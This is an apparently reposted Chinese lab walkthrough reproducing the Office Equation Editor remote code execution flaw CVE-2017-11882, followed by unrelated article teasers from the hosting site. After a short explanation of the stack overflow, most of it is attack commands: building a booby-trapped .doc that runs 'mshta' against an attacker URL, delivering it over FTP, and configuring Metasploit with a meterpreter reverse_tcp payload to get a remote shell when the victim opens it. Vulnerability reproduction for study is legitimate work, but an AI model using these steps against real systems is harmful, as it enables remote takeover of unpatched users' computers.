Office远程代码执行漏洞(CVE-2017-11882)漏洞复现

news2024/9/29 7:28:56

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现

  • 1.漏洞原理
  • 2.在Kali平台查看漏洞利用文件
  • 3.登录目标靶机,打开FTP服务器
  • 4.登录Kali,利用FTP服务器上传payload-cale.doc文件
  • 5.登录目标靶机,触发doc文件,验证存在漏洞
  • 6.登录kali平台,执行命令,生成含有攻击代码的doc文档
  • 7.在kali平台上启动并配置metapsloit
  • 8.在目标平台双击payloadattack.doc文档,触发漏洞

1.漏洞原理

CVE-2017-11882允许攻击者在当前用户的上下文中运行任意代码,导致无法正确处理内存中的对象,即为“ Microsoft Office Memory Corruption Vulnerability “,栈溢出的远程执行漏洞

该漏洞是在EQNEDT32.EXE组件的缓冲区溢出导致。当受害用户打开Office文档时就有可能被漏洞利用,危害极大。 原因是由于EQNEDT32.EXE进程读入包含MathType的ole数据。函数给Font Name数据分配的大小是0x24个字节,超过大小会造成栈缓冲区溢出。而程序在拷贝公式Font Name数据时没有对其长度进行校验,从而导致漏洞发生

通杀以下没有更新的Office版本:

  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016
  • MicrosoftOffice 365

漏洞环境:

攻击机:Kali(10.10.0.11)
工具:metasploit

目标靶机:Windows2008 (10.10.0.9)
工具:Office软件、Ftpserver

2.在Kali平台查看漏洞利用文件

准备攻击的payload文件(doc文件):

该文件由Github的CVE-2017-11882.py攻击脚本生成

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc

在这里插入图片描述

它的功能是打开office文本的同时能够弹出计算机程序,本实验通过此文本验证目标靶机上是否存在Office远程代码执行漏洞(CVE-2017-11882)漏洞


3.登录目标靶机,打开FTP服务器

打开FTP服务器。点击最左面绿色按钮,启动ftp服务器:

在这里插入图片描述

可以看到以下变化:ftp服务器启动。显示“FTP服务在线”。FTP文件目录是在靶机桌面上


4.登录Kali,利用FTP服务器上传payload-cale.doc文件

Kali终端上切换到root账户,之后使用ftp工具连接靶机服务:

在这里插入图片描述

登录ftp成功后,将payload-cale.doc文件通过命令上传到目标靶机windows2008上

put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc

在这里插入图片描述


5.登录目标靶机,触发doc文件,验证存在漏洞

在这里插入图片描述


6.登录kali平台,执行命令,生成含有攻击代码的doc文档

python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc 

在这里插入图片描述

利用FTP服务上传文件到目标靶机:

在这里插入图片描述


7.在kali平台上启动并配置metapsloit

启动:

msfconsole

在这里插入图片描述

查找CVE-2017-11882 漏洞:

search CVE-2017-11882 

加载攻击利用程序,设置payload及各项参数:

 use exploit/windows/smb/CVE-2017-11882 

在这里插入图片描述

设置payload为反弹tcp:

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

设置本机地址:

set lhost 10.10.0.11

设置uri的路径:

 set URIPATH payload

在这里插入图片描述

运行payload,启动利用后,msf会监听本机8080端口,靶机访问10.10.0.11:8080/payload,打开链接就会得到反弹到4444端口的tcp会话中

发起漏洞攻击:

exploit -j 

在这里插入图片描述


8.在目标平台双击payloadattack.doc文档,触发漏洞

在靶机桌面上可以看到上步ftp上传的文件的文件,双击打开此文件,即可建立连接了

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/687883.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

虚函数,抽象基类

编译器处理虚函数的方法: 给每个对象添加一个隐藏成员,隐藏成员保存了一个指向函数地址的数组指针,数组被称为虚函数表,虚函数表存储了为类对象声明的虚函数的地址,比如基类包含一个指针,该指针指向基类中…

阿里巴巴变革,盒马“一马当先”

配图来自canva可画 随着数字经济成为当前经济社会发展的“新宠”,诸多数字企业也开始走上了发展的快车道。而作为国内互联网大厂的阿里巴巴集团,为了打造数字经济时代的商业、金融、物流、云计算和大数据等新一代商业基础设施,就于前不久启动…

Javawed第一章:Web前端的入门理论

目录 前言 一.wed 💖wed是什么? 💖 wed的分类 二.HTML 和 CSS 💖HTML的介绍 HTML的标签 💖CSS的介绍 常用基本标签 💖实践 HTML结构标签特点 三.JavaScript 💖JavaScript的介绍 &…

SOLIDWORKS仿真数据清扫工具

我们来聊下SOLIDWORKS仿真数据清扫工具。与 SOLIDWORKS 软件一起安装的一个鲜为人知的工具是 Simulation Cleaning Utility。该实用工具可用于在 SOLIDWORKS 零件或装配文件中永远删除任何仿真数据,包括仿真设置和后处理信息。 SOLIDWORKS仿真数据清扫工具工具可以…

阻塞队列(消息队列)

1、阻塞队列 队列是一种先进先出的数据结构。而阻塞队列也是一种特殊的队列,也遵守”先进先出“的原则。 阻塞队列是一种线程安全的的数据结构,并且具有以下特性: 1、队列往进写元素是从队尾插入,队首取出 2、当插入元素的时候…

Python面向对象编程基础知识和示例代码

文章目录 对象(Object)示例代码一 类的成员方法(Method)示例代码二 类和对象(Class and Object):示例代码三 构造方法(Constructor):示例代码四 魔术方法&…

JUC简介

1、JUC介绍 JUC (java.util.concurrent)是在并发编程中使用的工具类,主要包括以下三个 (1)java.util.concurrent (2)java.util.concurrent.atomic 原子性:不可分割。Int i0; i, (3)…

MySQL——函数与约束的讲解

作者简介:一名云计算网络运维人员、每天分享网络与运维的技术与干货。 座右铭:低头赶路,敬事如仪 个人主页:网络豆的主页​​​​​ 前言 本章将会讲解MySQL数据库的函数与约束的讲解。 一.函数 函数 是指一段可以直接被另一…

渗透测试面试题汇总

2023年快过去一半了,不知道小伙伴们有没有找到自己心仪的工作呀【doge】,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。在网络安全的道路上越走越远! 所有的资料都整理成了PDF&#xff0c…

DCN v1阅读笔记

DCN v1即 Deformable Convolutional Networks。 视觉识别(例如对象检测和语义分割)中的一个关键挑战是如何适应物体尺度、姿态、视角和零件变形中的几何变化或模型几何变换。卷积神经网络(CNN)构建模块中为固定几何结构&#xff1…

神经网络基础

文章目录 一、神经网络基础1.得分函数 f(xi;W,b)1)从输入到输出的映射2)数学表示3)计算方法4)多组权重参数构成了决策边界 2.损失函数 L3.前向传播4.Softmax分类器 梯度下降2.反向传播 一、神经网络基础 回归任务:最终…

软件测试技能,JMeter压力测试教程,JDBC配置连接mysql数据库(十)

前言 使用jmeter压测接口的时候,有时候需要批量造数据,需使用jmeter连数据库造对应的测试数据 或者测试结束后,对测试的数据还原,删掉一些垃圾数据,都会用到连接数据库执行sql的操作 一、JDBC 连接配置 添加配置元…

7-WebApis-2

Web APIs - 2 掌握事件绑定处理和事件对象,完成常见网页交互 事件监听事件类型事件对象拓展知识综合案例 事件监听 以前写的代码都是自动执行的,我们希望一段代码在某个特定的时机才去执行,比如 点击按钮可以弹出警示框比如鼠标经过显示下拉…

通过easyui的filebox上传文件

本篇文章重点分享一下怎么通过easyui的filebox实现文件上传的功能&#xff0c;从前端代码到后端接口都会展示给大家。 1、form表单同步上传 传统的文件上传会把<input type"file" />放到一个<form></form>里&#xff0c;设置form表单的提交方式为…

开源代码分享(5)—配电网重构的启发式算法(附matlab代码)

来源于文献IEEE TRANSACTIONS ON POWER SYSTEMS期刊文献的开源代码。 摘要&#xff1a;本文提出了一种两阶段的启发式计算方法&#xff0c;可以在最小的计算时间内重新配置一个径向分布网络。所有的网络交换机在操作的初始阶段都是关闭的&#xff0c;并提出了一个顺序的开关开闸…

基于SSM+jsp的教学质量评价系统设计与实现

博主介绍&#xff1a; 大家好&#xff0c;我是一名在Java圈混迹十余年的程序员&#xff0c;精通Java编程语言&#xff0c;同时也熟练掌握微信小程序、Python和Android等技术&#xff0c;能够为大家提供全方位的技术支持和交流。 我擅长在JavaWeb、SSH、SSM、SpringBoot等框架…

Origin如何绘制三维离散点并拟合曲面?

文章目录 0.引言1.准备数据2.三维离散点参数设置并绘图3.拟合曲面参数设置并绘图 0.引言 在数据统计分析中&#xff0c;有时希望知道一个因变量在两个自变量变化情况下的变化情况&#xff0c;这时可以绘制散点图&#xff0c;观察基础情况&#xff0c;进一步可以拟合散点&#x…

腾讯安全吴石:基于威胁情报构建免疫体系,助力企业稳步迈向智能安全新阶段

6月13日&#xff0c;腾讯安全、腾讯研究院联合IDC、《中国信息安全》杂志社、CIO时代、新基建创新研究院等多家权威机构、媒体共同发起“数字安全免疫力研讨论坛”&#xff0c;聚合产学研各界专家学者探讨数字安全建设新范式。论坛上&#xff0c;腾讯安全联合IDC发布“数字安全…

【物联网】使用RabbitMQ作为MQTT服务端并自定义设备连接权限

文章目录 项目背景一、部署RabbiqMQ二、设备连接鉴权1.开启插件2.修改配置3.连接鉴权4.消息鉴权 总结 项目背景 最近公司启动了一个新的物联网项目&#xff0c;使用MQTT协议与设备通信&#xff0c;在比较了各大MQTT服务后&#xff0c;决定选用开源的RabbitMQ搭建我们的服务端。…

最专业的敏捷需求管理工具推荐

为了协助大家找到合适的需求管理工具&#xff0c;我们选择了国内外几款款工具作比对&#xff1a; Leangoo领歌敏捷工具 Jama Software Visure Requirements IBM DOORS Next ReqSuite RM ReQtest Xebrio Orcanos Helix RM SpiraTeam Accompa Innoslate Leangoo领歌…